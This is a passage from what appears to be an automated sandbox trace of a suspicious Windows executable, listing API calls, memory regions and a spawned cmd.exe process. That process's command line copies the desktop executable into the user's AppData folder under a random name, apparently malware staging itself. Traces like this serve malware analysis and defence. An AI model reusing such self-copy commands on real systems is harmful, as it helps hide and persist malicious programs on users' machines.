wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.973] FreeLibrary (hLibModule=0x76910000) returned 1 [0093.973] LocalFree (hMem=0x304410) returned 0x0 [0093.973] FreeLibrary (hLibModule=0x76910000) returned 1 [0093.973] LocalFree (hMem=0x304400) returned 0x0 [0093.973] ExitProcess (uExitCode=0x0) Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 215 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 216 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 217 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 218 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 219 start_va = 0x4a7b0000 end_va = 0x4a7fbfff entry_point = 0x4a7b0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 220 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 221 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 223 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 224 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 225 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 226 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 227 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 228 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 229 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 230 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 231 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 232 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 233 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 234 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 235 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 236 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 237 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 238 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 239 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 240 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 241 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 242 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 243 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 244 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 245 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 246 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 247 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 248 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 3 os_tid = 0xa94 [0092.686] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ff34 | out: lpSystemTimeAsFileTime=0x14ff34*(dwLowDateTime=0x76267ec0, dwHighDateTime=0x1d440a9)) [0092.686] GetCurrentProcessId () returned 0xa90 [0092.686] GetCurrentThreadId () returned 0xa94 [0092.686] GetTickCount () returned 0x2278c [0092.686] QueryPerformanceCounter (in: lpPerformanceCount=0x14ff2c | out: lpPerformanceCount=0x14ff2c*=14947533899) returned 1 [0092.687] GetModuleHandleA (lpModuleName=0x0) returned 0x4a7b0000 [0092.687] __set_app_type (_Type=0x1) [0092.687] __p__fmode () returned 0x76b331f4 [0092.687] __p__commode () returned 0x76b331fc [0092.687] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a7d21a6) returned 0x0 [0092.687] __getmainargs (in: _Argc=0x4a7d4238, _Argv=0x4a7d4240, _Env=0x4a7d423c, _DoWildCard=0, _StartInfo=0x4a7d4140 | out: _Argc=0x4a7d4238, _Argv=0x4a7d4240, _Env=0x4a7d423c) returned 0 [0092.687] GetCurrentThreadId () returned 0xa94 [0092.687] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa94) returned 0x38 [0092.687] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0092.687] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0092.687] SetThreadUILanguage (LangId=0x0) returned 0x409 [0092.688] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0092.688] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fec4 | out: phkResult=0x14fec4*=0x0) returned 0x2 [0092.688] VirtualQuery (in: lpAddress=0x14fefb, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0092.688] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0092.688] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0092.688] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0092.688] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0092.688] GetConsoleOutputCP () returned 0x1b5 [0092.688] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7d4260 | out: lpCPInfo=0x4a7d4260) returned 1 [0092.688] SetConsoleCtrlHandler (HandlerRoutine=0x4a7ce72a, Add=1) returned 1 [0092.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.688] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0092.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.688] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7d41ac | out: lpMode=0x4a7d41ac) returned 1 [0092.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.689] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.689] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.689] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7d41b0 | out: lpMode=0x4a7d41b0) returned 1 [0092.689] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.689] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0092.689] GetEnvironmentStringsW () returned 0x2b0178* [0092.689] FreeEnvironmentStringsW (penv=0x2b0178) returned 1 [0092.689] GetEnvironmentStringsW () returned 0x2b0178* [0092.689] FreeEnvironmentStringsW (penv=0x2b0178) returned 1 [0092.689] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee34 | out: phkResult=0x14ee34*=0x40) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0xa0, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x1, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x1, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x0, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x40, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x40, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x40, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegCloseKey (hKey=0x40) returned 0x0 [0092.690] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee34 | out: phkResult=0x14ee34*=0x40) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x40, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x1, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x1, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x0, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x9, 